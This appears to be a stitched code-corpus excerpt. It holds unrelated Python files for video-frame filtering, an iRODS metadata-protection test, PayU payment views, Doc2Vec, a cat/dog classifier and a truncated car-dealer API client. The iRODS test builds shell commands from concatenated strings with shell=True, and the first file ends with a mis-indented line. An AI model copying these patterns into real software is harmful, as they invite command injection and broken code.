    if (analysis_input is not None) and (analysis_output is None):
        raise Exception("No analysis output dir specified, but analysis input dir provided!")
    if (analysis_input is None) and (analysis_output is not None):
        raise Exception("No analysis input dir specified, but analysis output dir provided!")
    # open output
    out = None
    if output_type not in OUTPUT_TYPES:
        raise Exception("Unknown output type: %s" % output_type)
    if output_type == OUTPUT_MJPG:
        if verbose:
            log("Opening output video: %s" % output)
        # NOTE(review): cap is None for image-dir input, so MJPG output
        # requires a video/webcam input -- cap.get would fail otherwise.
        frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
        frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
        out = cv2.VideoWriter(output, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), output_fps, (frame_width, frame_height))
        # cropping would change the frame size, which a video writer cannot handle
        crop_to_content = False
    elif output_type == OUTPUT_JPG:
        # the format string must expand an integer frame number
        if (output_format % 1) == output_format:
            raise Exception("Output format does not expand integers: %s" % output_format)
    else:
        raise Exception("Unhandled output type: %s" % output_type)
    # iterate frames
    count = 0             # frames seen since the last one handed to analysis
    frames_count = 0      # total frames read from the input
    frames_processed = 0  # frames that passed analysis (or all, if no analysis)
    while ((cap is not None) and cap.isOpened()) or (files is not None):
        # next frame
        if cap is not None:
            retval, frame = cap.read()
        else:
            retval = frames_count < len(files)
            if retval:
                frame = cv2.imread(files[frames_count])
        count += 1
        frames_count += 1
        # NOTE(review): progress is logged regardless of `verbose`, although
        # the docstring says "in verbose mode" -- confirm which is intended.
        if (frames_count % progress) == 0:
            log("Frames processed: %d" % frames_count)
        # check frame window
        if (from_frame > 0) and (frames_count < from_frame):
            continue
        if (to_frame > 0) and (frames_count > to_frame):
            log("Reached to_frame (%d)" % to_frame)
            break
        if (max_frames > 0) and (frames_processed >= max_frames):
            if verbose:
                log("Maximum number of processed frames reached: %d" % frames_processed)
            break
        # process frame
        if retval:
            if count >= nth_frame:
                count = 0
                metadata = None
                # do we want to keep frame?
                if analysis_input is not None:
                    keep, frame, metadata = process_image(frame, frames_count, analysis_input, analysis_output, analysis_tmp,
                                                          analysis_timeout, analysis_type, analysis_keep_files, min_score,
                                                          required_labels, excluded_labels, poll_interval,
                                                          crop_to_content, crop_margin, crop_min_width, crop_min_height,
                                                          verbose)
                    if not keep:
                        continue
                frames_processed += 1
                if out is not None:
                    out.write(frame)
                else:
                    # keep original filename when using image_dir
                    tmp_file = None
                    if (files is not None) and keep_original:
                        if output_tmp is not None:
                            tmp_file = os.path.join(output_tmp, os.path.basename(files[frames_count - 1]))
                        out_file = os.path.join(output, os.path.basename(files[frames_count - 1]))
                    else:
                        if output_tmp is not None:
                            tmp_file = os.path.join(output_tmp, output_format % frames_count)
                        out_file = os.path.join(output, output_format % frames_count)
                    # write via tmp dir + rename when configured, to avoid
                    # consumers picking up half-written files
                    if output_tmp is not None:
                        cv2.imwrite(tmp_file, frame)
                        os.rename(tmp_file, out_file)
                        if verbose:
                            log("Frame written to: %s" % out_file)
                        if output_metadata and (metadata is not None):
                            tmp_file = os.path.splitext(tmp_file)[0] + ".yaml"
                            out_file = os.path.splitext(out_file)[0] + ".yaml"
                            with open(tmp_file, "w") as yf:
                                safe_dump(metadata, yf)
                            os.rename(tmp_file, out_file)
                            if verbose:
                                log("Meta-data written to: %s" % out_file)
                    else:
                        cv2.imwrite(out_file, frame)
                        if verbose:
                            log("Frame written to: %s" % out_file)
                        if output_metadata and (metadata is not None):
                            out_file = os.path.splitext(out_file)[0] + ".yaml"
                            with open(out_file, "w") as yf:
                                safe_dump(metadata, yf)
                            if verbose:
                                log("Meta-data written to: %s" % out_file)
        else:
            break
    log("Frames processed: %d" % frames_count)
    if cap is not None:
        cap.release()
    if out is not None:
        out.release()
def main(args=None):
    """
    The main method for parsing command-line arguments and running the application.

    :param args: the commandline arguments, uses sys.argv if not supplied
    :type args: list
    """
    parser = argparse.ArgumentParser(
        prog="vfs-process",
        description="Tool for replaying videos or grabbing frames from webcam, presenting it to an image analysis "
                    + "framework to determine whether to include the frame in the output.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("--input", metavar="DIR_OR_FILE_OR_ID", help="the dir with images, video file to read or the webcam ID", required=True)
    parser.add_argument("--input_type", help="the input type", choices=INPUT_TYPES, required=True)
    parser.add_argument("--nth_frame", metavar="INT", help="every nth frame gets presented to the analysis process", required=False, type=int, default=10)
    parser.add_argument("--max_frames", metavar="INT", help="the maximum number of processed frames before exiting (<=0 for unlimited)", required=False, type=int, default=0)
    parser.add_argument("--from_frame", metavar="INT", help="the starting frame (incl.); ignored if <= 0", required=False, type=int, default=-1)
    parser.add_argument("--to_frame", metavar="INT", help="the last frame to process (incl.); ignored if <= 0", required=False, type=int, default=-1)
    parser.add_argument("--analysis_input", metavar="DIR", help="the input directory used by the image analysis process; if not provided, all frames get accepted", required=False)
    parser.add_argument("--analysis_tmp", metavar="DIR", help="the temporary directory to place the images in before moving them into the actual input directory (to avoid race conditions)", required=False)
    parser.add_argument("--analysis_output", metavar="DIR", help="the output directory used by the image analysis process", required=False)
    parser.add_argument("--analysis_timeout", metavar="SECONDS", help="the maximum number of seconds to wait for the image analysis to finish processing", required=False, type=float, default=10)
    parser.add_argument("--analysis_type", help="the type of output the analysis process generates", choices=ANALYSIS_TYPES, required=False, default=ANALYSIS_TYPES[0])
    parser.add_argument("--analysis_keep_files", help="whether to keep the analysis files rather than deleting them", action="store_true", required=False)
    parser.add_argument("--min_score", metavar="FLOAT", help="the minimum score that a prediction must have", required=False, type=float, default=0.0)
    parser.add_argument("--required_labels", metavar="LIST", help="the comma-separated list of labels that the analysis output must contain (with high enough scores)", required=False)
    parser.add_argument("--excluded_labels", metavar="LIST", help="the comma-separated list of labels that the analysis output must not contain (with high enough scores)", required=False)
    parser.add_argument('--poll_interval', type=float, help='interval in seconds for polling for result files', required=False, default=0.1)
    parser.add_argument("--output", metavar="DIR_OR_FILE", help="the output directory or file for storing the selected frames (use .avi or .mkv for videos)", required=True)
    parser.add_argument("--output_type", help="the type of output to generate", choices=OUTPUT_TYPES, required=True)
    parser.add_argument("--output_format", metavar="FORMAT", help="the format string for the images, see https://docs.python.org/3/library/stdtypes.html#old-string-formatting", required=False, default="%06d.jpg")
    parser.add_argument("--output_tmp", metavar="DIR", help="the temporary directory to write the output images to before moving them to the output directory (to avoid race conditions with processes that pick up the images)", required=False)
    parser.add_argument("--output_fps", metavar="FORMAT", help="the frames per second to use when generating a video", required=False, type=int, default=25)
    parser.add_argument("--crop_to_content", help="whether to crop the frame to the detected content", action="store_true", required=False)
    parser.add_argument("--crop_margin", metavar="INT", help="the margin in pixels to use around the determined crop region", required=False, type=int, default=0)
    parser.add_argument("--crop_min_width", metavar="INT", help="the minimum width for the cropped content", required=False, type=int, default=2)
    parser.add_argument("--crop_min_height", metavar="INT", help="the minimum height for the cropped content", required=False, type=int, default=2)
    parser.add_argument("--output_metadata", help="whether to output a YAML file alongside the image with some metadata when outputting frame images", required=False, action="store_true")
    parser.add_argument("--progress", metavar="INT", help="every nth frame a progress message is output on stdout", required=False, type=int, default=100)
    parser.add_argument("--keep_original", help="keeps the original file name when processing an image dir", action="store_true", required=False)
    parser.add_argument("--verbose", help="for more verbose output", action="store_true", required=False)
    parsed = parser.parse_args(args=args)

    # parse labels: split the comma-separated CLI strings into lists
    required_labels = None
    if parsed.required_labels is not None:
        required_labels = parsed.required_labels.split(",")
    excluded_labels = None
    if parsed.excluded_labels is not None:
        excluded_labels = parsed.excluded_labels.split(",")

    # hand everything over to the actual processing loop
    process(input=parsed.input, input_type=parsed.input_type, nth_frame=parsed.nth_frame, max_frames=parsed.max_frames,
            analysis_input=parsed.analysis_input, analysis_output=parsed.analysis_output,
            analysis_tmp=parsed.analysis_tmp, analysis_timeout=parsed.analysis_timeout,
            analysis_type=parsed.analysis_type, analysis_keep_files=parsed.analysis_keep_files,
            from_frame=parsed.from_frame, to_frame=parsed.to_frame,
            min_score=parsed.min_score, required_labels=required_labels, excluded_labels=excluded_labels,
            poll_interval=parsed.poll_interval,
            output=parsed.output, output_type=parsed.output_type, output_format=parsed.output_format,
            output_tmp=parsed.output_tmp, output_fps=parsed.output_fps, output_metadata=parsed.output_metadata,
            crop_to_content=parsed.crop_to_content, crop_margin=parsed.crop_margin,
            crop_min_width=parsed.crop_min_width, crop_min_height=parsed.crop_min_height,
            verbose=parsed.verbose, progress=parsed.progress, keep_original=parsed.keep_original)
def sys_main():
    """
    Runs the main function using the system cli arguments, and
    returns a system error code.

    :return: 0 for success, 1 for failure.
    :rtype: int
    """
    try:
        main()
    except Exception:
        # Print the full traceback so the failure cause reaches the console.
        print(traceback.format_exc())
        return 1
    return 0
if __name__ == '__main__':
main()
| 2.1875 | 2 |
avu-protect/avuprotecttest.py | seandavi/irods_contrib | 10 | 12762470 | """Test the rules that protect AVU records having attributes with a
given prefix.
"""
import ConfigParser
import subprocess
import unittest
class AVUProtectTest(unittest.TestCase): #pylint: disable=R0904
    """Test suite based on the unittest framework.

    Exercises iRODS rules that protect AVU (attribute/value/unit) metadata
    whose attribute name starts with a configured prefix: non-admin users
    must not be able to add protected AVUs, admins must, and data objects
    carrying the protected "<prefix>archive" AVU must not be deletable.
    All iRODS interaction goes through the icommands (imeta, iput, irm,
    ils, ichmod) via subprocess with shell=True.
    """
    def __init__(self, *args, **kwargs):
        """Read configuration from avuprotecttest.cfg."""
        super(AVUProtectTest, self).__init__(*args, **kwargs)
        config = ConfigParser.RawConfigParser()
        config.read('avuprotecttest.cfg')
        # Password of the 'rods' admin account, used for iinit in admin tests.
        self.rodspw = config.get('AVUProtectTest', 'admin_password')
        # iRODS collection used as the test sandbox.
        self.expcoll = config.get('AVUProtectTest', 'expcoll')
        # Name of the local temp file that gets iput into the collection.
        self.testfile = config.get('AVUProtectTest', 'testfile')
        # Attribute-name prefix marking an AVU as protected.
        self.attrprefix = config.get('AVUProtectTest', 'attrprefix')
        # Full logical path of the uploaded test object inside iRODS.
        self.fpath = self.expcoll + "/" + self.testfile
    def listavus(self):
        """Print the AVUs for the test file (diagnostic aid)."""
        ret = subprocess.call("imeta ls -d '" + self.fpath + "'", shell=True)
        self.assertEqual(ret, 0)
    def listfiles(self):
        """Print the list of files in the collection (diagnostic aid)."""
        ret = subprocess.call("ils '" + self.expcoll + "'", shell=True)
        self.assertEqual(ret, 0)
    def setUp(self): #pylint: disable=C0103
        """Setup done before each test: validate config, create the local
        temp file and upload it into the test collection."""
        if (self.rodspw == "" or
                self.expcoll == "" or
                self.testfile == "" or
                self.attrprefix == ""):
            # NOTE(review): the message below says 'avuprotesttest.cfg' but
            # the file actually read is 'avuprotecttest.cfg' — typo in the
            # user-facing string; fixing it would change a runtime string.
            print ("Edit avuprotesttest.cfg to specify collection, "
                   "temporary filename, "
                   "and attribute name prefix to use for testing.")
            exit()
        ret = subprocess.call("touch '" + self.testfile + "'", shell=True)
        self.assertEqual(ret, 0)
        ret = subprocess.call("iput '"
                              + self.testfile + "' '"
                              + self.expcoll + "'",
                              shell=True)
        self.assertEqual(ret, 0)
    def tearDown(self): #pylint: disable=C0103
        """Cleanup done after each test is called: remove the local temp
        file and the uploaded iRODS object."""
        ret = subprocess.call(["rm", self.testfile])
        self.assertEqual(ret, 0)
        ret = subprocess.call("irm -f '" + self.fpath + "'", shell=True)
        self.assertEqual(ret, 0)
    def test_01_disallow_add_nonadmin(self):
        """Do not allow non-admin users to add protected AVU."""
        ret = subprocess.call("imeta add -d '"
                              + self.fpath
                              + "' '" + self.attrprefix + "archive' 'true'",
                              shell=True)
        # imeta exits 4 when the server-side rule rejects the operation —
        # TODO confirm the exact exit-code meaning against the rule set.
        self.assertEqual(ret, 4)
    def test_02_allow_add_nonadmin(self):
        """Confirm non-protected AVUs can be added."""
        ret = subprocess.call("imeta add -d '"
                              + self.fpath
                              + "' 'T2T3' 'nonadmin'",
                              shell=True)
        self.assertEqual(ret, 0)
    def test_03_allow_rm_nonadmin(self):
        """Confirm non-protected AVUs can be removed."""
        # Add the non-protected AVU.
        ret = subprocess.call("imeta add -d '"
                              + self.fpath
                              + "' 'T2T3' 'nonadmin'",
                              shell=True)
        self.assertEqual(ret, 0)
        # Remove the non-protected AVU.
        ret = subprocess.call("imeta rm -d '"
                              + self.fpath
                              + "' 'T2T3' 'nonadmin'",
                              shell=True)
        self.assertEqual(ret, 0)
    def test_04_allow_mod_nonadmin(self):
        """Confirm non-protected AVUs can be modified."""
        # Add the non-protected AVU.
        ret = subprocess.call("imeta add -d '"
                              + self.fpath
                              + "' 'T4-1' 'nonadmin'",
                              shell=True)
        self.assertEqual(ret, 0)
        # Modify the non-protected AVU (n: renames attribute, v: new value).
        ret = subprocess.call("imeta mod -d '"
                              + self.fpath
                              + "' 'T4-1' 'nonadmin' 'n:T4-2' 'v:nonadmin-2'",
                              shell=True)
        self.assertEqual(ret, 0)
        # Remove the non-protected AVU under its new name/value.
        ret = subprocess.call("imeta rm -d '"
                              + self.fpath
                              + "' 'T4-2' 'nonadmin-2'",
                              shell=True)
        self.assertEqual(ret, 0)
    def test_05_allow_add_admin(self):
        """Confirm an admin can still add protected AVUs."""
        # Grant admin write permission on the test file.
        ret = subprocess.call("ichmod write rods '"
                              + self.fpath
                              + "'",
                              shell=True)
        self.assertEqual(ret, 0)
        # Add the protected AVU while authenticated as the 'rods' admin.
        ret = subprocess.call("export irodsUserName='rods'; "
                              + "export irodsAuthScheme='password'; "
                              + "echo '" + self.rodspw + "' | iinit ; "
                              + "imeta add -d '"
                              + self.fpath
                              + "' '" + self.attrprefix + "archive' 'true'",
                              shell=True)
        self.assertEqual(ret, 0)
        self.listavus()
        # Remove the protected AVU again so tearDown's irm can succeed.
        ret = subprocess.call("export irodsUserName='rods'; "
                              + "export irodsAuthScheme='password'; "
                              + "echo '" + self.rodspw + "' | iinit ; "
                              + "imeta rm -d '"
                              + self.fpath
                              + "' '" + self.attrprefix + "archive' 'true'",
                              shell=True)
        self.assertEqual(ret, 0)
    def test_06_disallow_del_archive(self):
        """Prevent deletion of data objects having the archive AVU set."""
        # Grant admin write permission on the test file.
        ret = subprocess.call("ichmod write rods '"
                              + self.fpath
                              + "'",
                              shell=True)
        self.assertEqual(ret, 0)
        # Add the protected AVU with archive set to true (as admin).
        ret = subprocess.call("export irodsUserName='rods'; "
                              + "export irodsAuthScheme='password'; "
                              + "echo '" + self.rodspw + "' | iinit ; "
                              + "imeta add -d '"
                              + self.fpath
                              + "' '" + self.attrprefix + "archive' 'true'",
                              shell=True)
        self.assertEqual(ret, 0)
        self.listavus()
        # Verify that removal fails while the archive AVU is present.
        # irm exits 3 here — presumably the rule-rejection exit code for
        # irm; TODO confirm against the deployed rule set.
        ret = subprocess.call("irm -f '" + self.fpath + "'", shell=True)
        self.assertEqual(ret, 3)
        self.listfiles()
        # Remove the protected archive attribute so tearDown can delete.
        ret = subprocess.call("export irodsUserName='rods'; "
                              + "export irodsAuthScheme='password'; "
                              + "echo '" + self.rodspw + "' | iinit ; "
                              + "imeta rm -d '"
                              + self.fpath
                              + "' '" + self.attrprefix + "archive' 'true'",
                              shell=True)
        self.assertEqual(ret, 0)
        self.listavus()
if __name__ == '__main__':
    # Run the whole suite through unittest's CLI test runner.
    unittest.main()
| 2.984375 | 3 |
getpaid/backends/payu/views.py | fizista/django-getpaid | 0 | 12762471 | import logging
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.views.generic.base import View
from django.views.generic.detail import DetailView
from getpaid.backends.payu import PaymentProcessor
from getpaid.models import Payment
logger = logging.getLogger('getpaid.backends.payu')
class OnlineView(View):
    """
    Handles PayU "online" notifications that acknowledge a payment status
    change.  This view only checks that the expected POST fields are
    present; the actual processing is delegated to
    ``PaymentProcessor.online()``.
    """
    def post(self, request, *args, **kwargs):
        required_fields = ('pos_id', 'session_id', 'ts', 'sig')
        try:
            # Pull all four mandatory fields; a missing one raises KeyError.
            pos_id, session_id, ts, sig = (
                request.POST[name] for name in required_fields
            )
        except KeyError:
            logger.warning('Got malformed POST request: %s' % str(request.POST))
            return HttpResponse('MALFORMED')
        status = PaymentProcessor.online(pos_id, session_id, ts, sig)
        return HttpResponse(status)
class SuccessView(DetailView):
    """
    This view just redirects to standard backend success link.
    """
    # DetailView resolves the Payment instance from the 'pk' URL kwarg.
    model = Payment
    def render_to_response(self, context, **response_kwargs):
        # No template is rendered; bounce to getpaid's shared success view.
        return HttpResponseRedirect(reverse('getpaid-success-fallback', kwargs={'pk': self.object.pk}))
class FailureView(DetailView):
    """
    This view just redirects to standard backend failure link.
    """
    # DetailView resolves the Payment instance from the 'pk' URL kwarg.
    model = Payment
    def render_to_response(self, context, **response_kwargs):
        # 'pk' and 'error' come from the URLconf — presumably PayU redirects
        # here with an error code; verify against the urls.py pattern.
        logger.error("Payment %s failed on backend error %s" % (self.kwargs['pk'], self.kwargs['error']))
        return HttpResponseRedirect(reverse('getpaid-failure-fallback', kwargs={'pk': self.object.pk}))
| 2.390625 | 2 |
Classifier.py | Bharathgc/Cat-Vs-Dog-Classifier | 0 | 12762472 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 6 23:45:16 2018
@author: <NAME>
"""
import os
from tqdm import tqdm
import cv2
from keras.models import Sequential
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
from keras.preprocessing.image import ImageDataGenerator
import csv
TRAIN_DIR = "./train"
IMG_SIZE = 50
TEST_DIR = "./test/"
def CreateDataset():
    """Resize every training image to IMG_SIZE x IMG_SIZE grayscale and
    copy it into ./training_data/<cats|dogs>/<counter>.jpg.

    Filenames are expected to look like '<label>.<id>.jpg' with label
    'cat' or 'dog'.  Files with any other label are now skipped.
    """
    counter = 1
    for image in tqdm(os.listdir(TRAIN_DIR)):
        # Get the label name ('cat' or 'dog') from the file name.
        label = image.split('.')[-3]
        if label == 'cat':
            GroundTruth = "cats"
        elif label == 'dog':
            GroundTruth = "dogs"
        else:
            # Bug fix: previously GroundTruth stayed unbound for an
            # unexpected label and the imwrite below raised NameError.
            continue
        path = os.path.join(TRAIN_DIR, image)
        # Load as grayscale and resize the image to IMG_SIZE x IMG_SIZE.
        image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
        image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
        # Save the image under its class folder with a running counter name.
        cv2.imwrite(r"./training_data/" + GroundTruth + "/" + str(counter) + ".jpg", image)
        counter += 1
def TestData(model):
    """Run the trained model over every image in TEST_DIR and collect the
    raw sigmoid outputs, keyed by the numeric part of each file name."""
    predictions = {}
    for filename in tqdm(os.listdir(TEST_DIR)):
        name_parts = filename.split('.')
        full_path = os.path.join(TEST_DIR, filename)
        # Load in color, match the network's 50x50x3 input, add batch axis.
        img = cv2.imread(full_path)
        img = cv2.resize(img, (50, 50))
        img = img.reshape(1, 50, 50, 3)
        predictions[int(name_parts[0])] = model.predict(img)[0][0]
    return predictions
def WriteResultsIntoCSV(Results):
    """Dump the {image-number: prediction} mapping to results.csv,
    ordered by image number, one (number, prediction) row per image."""
    ordered = dict(sorted(Results.items()))
    print("Writing CSV")
    with open('results.csv', 'w', newline="") as csv_file:
        writer = csv.writer(csv_file)
        for image_no, prediction in tqdm(ordered.items()):
            writer.writerow([image_no, prediction])
def TrainModel():
    """Build, compile and train the cat/dog CNN from ./training_data.

    Returns the trained keras Sequential model.
    """
    # Initialising the CNN
    model = Sequential()
    # Convolution: 32 3x3 filters over the 50x50 RGB input.
    model.add(Conv2D(32, (3, 3), input_shape = (50, 50, 3), activation = 'relu'))
    # Pooling
    model.add(MaxPooling2D(pool_size = (2, 2)))
    # Second convolutional layer
    model.add(Conv2D(32, (3, 3), activation = 'relu'))
    model.add(MaxPooling2D(pool_size = (2, 2)))
    # Flattening
    model.add(Flatten())
    # Full connection
    model.add(Dense(units = 128, activation = 'relu'))
    # Single sigmoid output: probability of the positive class.
    model.add(Dense(units = 1, activation = 'sigmoid'))
    # Compiling the CNN
    model.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
    # On-the-fly augmentation for the training images.
    train_datagen = ImageDataGenerator(rescale = 1./255,shear_range = 0.2,zoom_range = 0.2,horizontal_flip = True)
    #test_datagen = ImageDataGenerator(rescale = 1./255)
    training_set = train_datagen.flow_from_directory('training_data',target_size = (50, 50),batch_size = 32,class_mode = 'binary')
    # NOTE(review): validation_steps is passed without validation_data, so it
    # is likely ignored; confirm whether a validation generator was intended.
    model.fit_generator(training_set,steps_per_epoch = 8000,epochs = 25, validation_steps = 2000)
    print("Model Training Done")
    return model
if __name__ == '__main__':
    # One-time preprocessing: normalize/resize the images and separate the
    # training data into class folders (uncomment for the first run).
    #CreateDataset()
    # Train the model, then predict on the test set and write a CSV.
    print("Training the Model")
    model = TrainModel()
    print("Testing the Model")
    Results = TestData(model)
    WriteResultsIntoCSV(Results)
| 2.78125 | 3 |
tests/appsec/test_PII.py | DataDog/system-tests | 3 | 12762473 | # Unless explicitly stated otherwise all files in this repository are licensed under the the Apache License Version 2.0.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2021 Datadog, Inc.
from utils import BaseTestCase, context, released, interfaces, coverage
import pytest
if context.library == "cpp":
    # The PII-scrubbing scenario does not apply to the C++ tracer, so the
    # whole module is skipped for that library.
    pytestmark = pytest.mark.skip("not relevant")
@released(golang="?", dotnet="?", java="?", nodejs="?", php="?", python="?", ruby="?")
@coverage.not_implemented
class Test_Scrubbing(BaseTestCase):
    """Appsec scrubs all sensitive data"""
| 1.625 | 2 |
autoencoder/baseline/doc2vec.py | hugochan/K-Competitive-Autoencoder-for-Text-Analytics | 133 | 12762474 | '''
Created on Jan, 2017
@author: hugo
'''
from __future__ import absolute_import
import multiprocessing
from gensim.models import Doc2Vec
class MyDoc2Vec(object):
    """Thin wrapper around gensim's Doc2Vec with a fixed training recipe."""

    def __init__(self, dim, hs=0, window=5, negative=5, epoches=5, dm=1, dm_concat=1):
        """Store the hyper-parameters; the model itself is built in train()."""
        super(MyDoc2Vec, self).__init__()
        self.dim = dim
        self.hs = hs
        self.window = window
        self.negative = negative
        self.epoches = epoches
        self.dm = dm
        self.dm_concat = dm_concat

    def train(self, corpus):
        """Build the vocabulary and run ``epoches`` training passes.

        ``corpus`` is a callable returning a fresh iterator of tagged
        documents on each call.  Returns self for chaining.
        """
        self.model = Doc2Vec(
            min_count=1,
            window=self.window,
            size=self.dim,
            workers=multiprocessing.cpu_count(),
            hs=self.hs,
            negative=self.negative,
            iter=1,
            dm=self.dm,
            dm_concat=self.dm_concat,
        )
        self.model.build_vocab(corpus())
        for _ in range(self.epoches):
            self.model.train(corpus())
        return self
def predict(model, corpus):
    """Infer a document vector for every document yielded by ``corpus()``
    and return them as {doc_name: vector-as-list}."""
    return {
        doc_name[0]: model.infer_vector(doc_words).tolist()
        for doc_words, doc_name in corpus()
    }
def save_doc2vec(model, outfile):
    """Persist a trained Doc2Vec model to ``outfile`` via gensim's save()."""
    model.save(outfile)
def load_doc2vec(mod_file):
    """Load a Doc2Vec model previously saved with save_doc2vec()."""
    return Doc2Vec.load(mod_file)
| 2.453125 | 2 |
backend/app/api/api_v1/routes/debits.py | ralphribeiro/debito_automatico | 0 | 12762475 | from enum import Enum
from typing import Any
from app.schemas.debit import DebitCreate, DebitUpdate
from fastapi import APIRouter, Depends, HTTPException
from fastapi import status as sts
from sqlalchemy.orm import Session
from app import crud, models, schemas
from app.api import deps
from app.core.celery_app import celery_app
router = APIRouter()
class StatusRequest(str, Enum):
    # Allowed target states for an automatic-debit request; inheriting
    # from str lets FastAPI validate and serialize the values directly.
    canceled = "canceled"
    approved = "approved"
    rejected = "rejected"
@router.get("/request", response_model=schemas.Debit)
async def get_automatic_debit_request(
    db: Session = Depends(deps.get_db),
    current_user: models.User = Depends(deps.get_current_active_user)
) -> Any:
    """
    Request Automatic Debit.
    """
    # A user may only have one open automatic-debit request at a time.
    existing = crud.debit.get_by_owner(db, owner_id=current_user.id)
    if existing is not None:
        raise HTTPException(
            status_code=sts.HTTP_400_BAD_REQUEST,
            detail="Automatic debit request already made.",
        )
    return crud.debit.create_with_owner(
        db, obj_in=DebitCreate(), owner_id=current_user.id
    )
@router.put("/{owner_id}", response_model=schemas.Debit)
async def update_status(
    owner_id: int,
    status: StatusRequest,
    db: Session = Depends(deps.get_db),
    current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
    """
    Update Automatic Debit Status.
    """
    debit = crud.debit.get_by_owner(db, owner_id=owner_id)
    if debit is None:
        raise HTTPException(status_code=sts.HTTP_404_NOT_FOUND,
                            detail="Not Found automatic debit request by id")
    updated = crud.debit.update_status(
        db, db_obj=debit, obj_in=DebitUpdate(status=status)
    )
    # Only transitions that end the review flow trigger a notification
    # e-mail to the request owner (sent asynchronously via celery).
    if status in (StatusRequest.canceled, StatusRequest.approved):
        owner = crud.user.get(db, id=debit.owner_id)
        celery_app.send_task("app.tasks.send_email.email_task",
                             args=[status, owner.email])
    return updated
@router.get("/{owner_id}", response_model=schemas.Debit)
async def get_automatic_debit_by_owner_id(
    owner_id: int,
    db: Session = Depends(deps.get_db),
    current_user: models.User = Depends(deps.get_current_active_user)
) -> Any:
    """
    Get Automatic Debit By Owner Id.
    """
    debit = crud.debit.get_by_owner(db, owner_id=owner_id)
    if debit is None:
        raise HTTPException(
            status_code=sts.HTTP_404_NOT_FOUND,
            detail="Automatic debit request not found.",
        )
    return debit
| 2.21875 | 2 |
server/djangoapp/restapis.py | jeetgor/agfzb-CloudAppDevelopment_Capstone | 0 | 12762476 | <gh_stars>0
import requests
import json
# import related models here
from requests.auth import HTTPBasicAuth
from .models import CarDealer, DealerReview
# Create a `get_request` to make HTTP GET requests
# e.g., response = requests.get(url, params=params, headers={'Content-Type': 'application/json'},
# auth=HTTPBasicAuth('apikey', api_key))
def get_request(url, **kwargs):
    """HTTP GET helper.

    Keyword arguments are forwarded as query-string parameters.  The
    special ``api_key`` kwarg is used for HTTP basic auth and is popped
    out of ``kwargs`` first, so the credential is no longer leaked into
    the query string (security fix).  Returns the decoded JSON payload,
    or None when the request or decoding fails.
    """
    print(kwargs)
    print("GET from {} ".format(url))
    # Pull the credential out of kwargs so it is not sent as a query param.
    api_key = kwargs.pop("api_key", None)
    try:
        if api_key:
            # Authenticated GET (e.g. Watson NLU) via HTTP basic auth.
            response = requests.get(url, headers={'Content-Type': 'application/json'},
                                    params=kwargs, auth=HTTPBasicAuth('apikey', api_key))
        else:
            # Anonymous GET.
            response = requests.get(url, headers={'Content-Type': 'application/json'},
                                    params=kwargs)
        status_code = response.status_code
        print("With status {} ".format(status_code))
        return json.loads(response.text)
    except Exception:
        # Narrowed from a bare ``except:`` so SystemExit/KeyboardInterrupt
        # still propagate; the failure path now returns None explicitly.
        print("Network exception occurred")
        return None
# Create a `post_request` to make HTTP POST requests
# e.g., response = requests.post(url, params=kwargs, json=payload)
def post_request(url, json_payload, **kwargs):
    """HTTP POST helper.

    Sends ``json_payload`` as the JSON body and kwargs as query
    parameters; returns the decoded JSON response, or None when the
    request fails.
    """
    try:
        response = requests.post(url, json=json_payload, params=kwargs)
    except Exception:
        # Bug fix: execution previously fell through to
        # json.loads(response.text) with ``response`` unbound, raising
        # NameError instead of reporting the network failure.
        print("Network exception occurred")
        return None
    return json.loads(response.text)
# Create a get_dealers_from_cf method to get dealers from a cloud function
def get_dealers_from_cf(url, **kwargs):
    """Fetch dealer records from the cloud function at ``url`` and map
    each JSON entry onto a CarDealer object; empty list on failure."""
    json_result = get_request(url)
    if not json_result:
        return []
    dealers = []
    # Each row in 'entries' carries one dealer's fields.
    for entry in json_result["entries"]:
        dealers.append(CarDealer(
            address=entry["address"],
            city=entry["city"],
            full_name=entry["full_name"],
            id=entry["id"],
            lat=entry["lat"],
            long=entry["long"],
            short_name=entry["short_name"],
            st=entry["st"],
            zip=entry["zip"],
            state=entry['state'],
        ))
    return dealers
# Create a get_dealer_reviews_from_cf method to get reviews by dealer id from a cloud function
def get_dealer_reviews_from_cf(url, **kwargs):
    """Fetch the reviews for a dealer from the cloud function, wrap each
    one in a DealerReview and attach a Watson NLU sentiment label."""
    json_result = get_request(url)
    if not json_result:
        return []
    parsed = []
    for entry in json_result["entries"]:
        parsed.append(DealerReview(
            id=entry["id"],
            name=entry["name"],
            dealership=entry["dealership"],
            review=entry["review"],
            purchase=entry["purchase"],
            purchase_date=entry["purchase_date"],
            car_make=entry["car_make"],
            car_model=entry["car_model"],
            car_year=entry["car_year"],
            # Sentiment is computed from the free-text review body.
            sentiment=analyze_review_sentiments(entry.get("review", "")),
        ))
    return parsed
def add_dealer_review_to_db(review_post):
    """Translate the submitted form fields into the cloud-function review
    schema and POST it; returns the decoded JSON response (or None)."""
    # Required fields use direct indexing; optional ones fall back via get().
    payload = {
        "id": review_post['review_id'],
        "name": review_post['reviewer_name'],
        "dealership": review_post['dealership'],
        "review": review_post['review'],
        "purchase": review_post.get('purchase', False),
        "purchase_date": review_post.get('purchase_date'),
        "car_make": review_post.get('car_make'),
        "car_model": review_post.get('car_model'),
        "car_year": review_post.get('car_year'),
    }
    return post_request('https://06e36d79.us-south.apigw.appdomain.cloud/api/review-post', payload)
# Create an `analyze_review_sentiments` method to call Watson NLU and analyze text
def analyze_review_sentiments(text):
    """Call Watson NLU on ``text`` and return the document sentiment
    label, or None when the service call fails or returns no sentiment.
    """
    import os  # local import keeps this fix self-contained in the block
    # SECURITY fix: the API key used to be hard-coded in source; read it
    # from the environment so the credential never lands in source control.
    nlu_api_key = os.environ.get("NLU_API_KEY", "<KEY>")
    json_result = get_request(
